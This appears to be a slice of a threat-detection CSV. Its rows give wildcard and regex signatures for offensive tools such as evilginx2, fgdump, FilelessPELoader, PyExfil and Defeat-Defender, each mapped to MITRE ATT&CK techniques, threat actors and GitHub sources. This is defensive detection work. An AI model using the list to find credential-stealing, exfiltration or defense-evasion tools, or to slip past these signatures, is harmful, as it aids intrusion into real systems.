"*ffe12c22c2fca0229ce7fd8e7a5953a3df57b32a1c152ad5a104aacbba874a00*",".{0,1000}ffe12c22c2fca0229ce7fd8e7a5953a3df57b32a1c152ad5a104aacbba874a00.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44850"
"*ffe1396fa56e5f86812443498cd6c8abfca613099df1261d08f06a73b14be042*",".{0,1000}ffe1396fa56e5f86812443498cd6c8abfca613099df1261d08f06a73b14be042.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44851"
"*ffe25c6a7a14c2f734af099af620d92bb87e0e6f6eb2f2d035c053232f7173a5*",".{0,1000}ffe25c6a7a14c2f734af099af620d92bb87e0e6f6eb2f2d035c053232f7173a5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44852"
"*FFE5AD77-8AF4-4A3F-8CE7-6BDC45565F07*",".{0,1000}FFE5AD77\-8AF4\-4A3F\-8CE7\-6BDC45565F07.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#GUIDproject","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","44853"
"*ffe9b626de7112df222bc99cbdecd1f321533dc08e32d2e19cea9642bbb0c4f7*",".{0,1000}ffe9b626de7112df222bc99cbdecd1f321533dc08e32d2e19cea9642bbb0c4f7.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","44854"
"*ffebf73d11403dc0bb57ab23a775a568ff5c67c1bb5f8fac7a1f2fbd3960b619*",".{0,1000}ffebf73d11403dc0bb57ab23a775a568ff5c67c1bb5f8fac7a1f2fbd3960b619.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44855"
"*fff1c91cf41743e46dc2b43b256680ce9015d0a705b31cf19c2cfb48f48c616f*",".{0,1000}fff1c91cf41743e46dc2b43b256680ce9015d0a705b31cf19c2cfb48f48c616f.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#filehash","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","44856"
"*fff54c4b8a879869c50760512e87a39578fea5e07ecead1086af4b50561b5453*",".{0,1000}fff54c4b8a879869c50760512e87a39578fea5e07ecead1086af4b50561b5453.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44858"
"*fffaec6a59c6d0b368fd980414500ffeb17f3155ec3353f679dfc6caf392ce84*",".{0,1000}fffaec6a59c6d0b368fd980414500ffeb17f3155ec3353f679dfc6caf392ce84.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44860"
"*ffnbelfdoeiohenkjibnmadjiehjhajb*",".{0,1000}ffnbelfdoeiohenkjibnmadjiehjhajb.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","44863"
"*ffuf *-input-cmd*",".{0,1000}ffuf\s.{0,1000}\-input\-cmd.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44864"
"*ffuf *-u http*",".{0,1000}ffuf\s.{0,1000}\-u\shttp.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44865"
"*ffuf -c *",".{0,1000}ffuf\s\-c\s.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44866"
"*ffuf -fs 185 -c -w *",".{0,1000}ffuf\s\-fs\s185\s\-c\s\-w\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","44867"
"*ffuf -w *",".{0,1000}ffuf\s\-w\s.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44868"
"*ffuf.exe*",".{0,1000}ffuf\.exe.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44869"
"*ffuf/ffuf*",".{0,1000}ffuf\/ffuf.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44870"
"*ffuf_*_freebsd_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_freebsd_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44871"
"*ffuf_*_linux_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_linux_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44872"
"*ffuf_*_macOS_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_macOS_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44873"
"*ffuf_*_openbsd_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_openbsd_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44874"
"*ffuf_*_windows_*.zip*",".{0,1000}ffuf_.{0,1000}_windows_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44875"
"*ffuf-master.zip*",".{0,1000}ffuf\-master\.zip.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44876"
"*fgdump.exe*",".{0,1000}fgdump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","44878"
"*fgexec -c *",".{0,1000}fgexec\s\-c\s.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","N/A","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","44879"
"*fgexec.exe*",".{0,1000}fgexec\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","44880"
"*fhbohimaelbohpjbbldcngcnapndodjp*",".{0,1000}fhbohimaelbohpjbbldcngcnapndodjp.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","44881"
"*fhilaheimglignddkjgofkcbgekhenbh*",".{0,1000}fhilaheimglignddkjgofkcbgekhenbh.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","44882"
"*fiddyschmitt/File-Tunnel*",".{0,1000}fiddyschmitt\/File\-Tunnel.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","1","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","44884"
"*fierce --domain* --dns-servers *",".{0,1000}fierce\s\-\-domain.{0,1000}\s\-\-dns\-servers\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","44885"
"*FiercePhish*",".{0,1000}FiercePhish.{0,1000}","offensive_tool_keyword","FiercePhish","FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns. schedule sending of emails. and much more. The features will continue to be expanded and will include website spoofing. click tracking. and extensive notification options. ","T1566 - T1566.001 - T1566.002 - T1566.003","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Phishing","https://github.com/Raikia/FiercePhish","1","1","N/A","N/A","N/A","10","1351","255","2024-01-09T02:59:26Z","2016-12-31T19:41:24Z","44886"
"*Fiesta Exploit Kit*",".{0,1000}Fiesta\sExploit\sKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","44887"
"*-file *.bin -instanceid 1337 - source persistence*",".{0,1000}\-file\s.{0,1000}\.bin\s\-instanceid\s1337\s\-\ssource\spersistence.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","44888"
"*--file dnschef.ini *",".{0,1000}\-\-file\sdnschef\.ini\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","44889"
"*File Generated Successfully.Run Defeat-Defender.bat on target machine*",".{0,1000}File\sGenerated\sSuccessfully\.Run\sDefeat\-Defender\.bat\son\starget\smachine.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","44890"
"*File specifed to backdoor does not exist: *",".{0,1000}File\sspecifed\sto\sbackdoor\sdoes\snot\sexist\:\s.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","44893"
"*file_parsers/group_policy_preferences.py*",".{0,1000}file_parsers\/group_policy_preferences\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","44894"
"*File_Smuggler_Http_Handler*",".{0,1000}File_Smuggler_Http_Handler.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","44896"
"*FILE_TO_EXFIL = ""*",".{0,1000}FILE_TO_EXFIL\s\=\s\"".{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","44897"
"*FileControler/FileControler_x64.dll*",".{0,1000}FileControler\/FileControler_x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","44898"
"*FileControler/FileControler_x86.dll*",".{0,1000}FileControler\/FileControler_x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","44899"
"*File-Extensions-Wordlist.txt*",".{0,1000}File\-Extensions\-Wordlist\.txt.{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","44900"
"*Fileless Lateral Movement.csproj*",".{0,1000}Fileless\sLateral\sMovement\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","44901"
"*fileless-elf-exec*",".{0,1000}fileless\-elf\-exec.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","44902"
"*FilelessPELoader.cpp*",".{0,1000}FilelessPELoader\.cpp.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","44903"
"*FilelessPELoader.exe*",".{0,1000}FilelessPELoader\.exe.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","44904"
"*FilelessPELoader.sln*",".{0,1000}FilelessPELoader\.sln.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","44905"
"*FilelessPELoader.vcxproj*",".{0,1000}FilelessPELoader\.vcxproj.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","44906"
"*FilelessPELoader-main*",".{0,1000}FilelessPELoader\-main.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","44907"
"*FilelessShellcode.cpp*",".{0,1000}FilelessShellcode\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","44908"
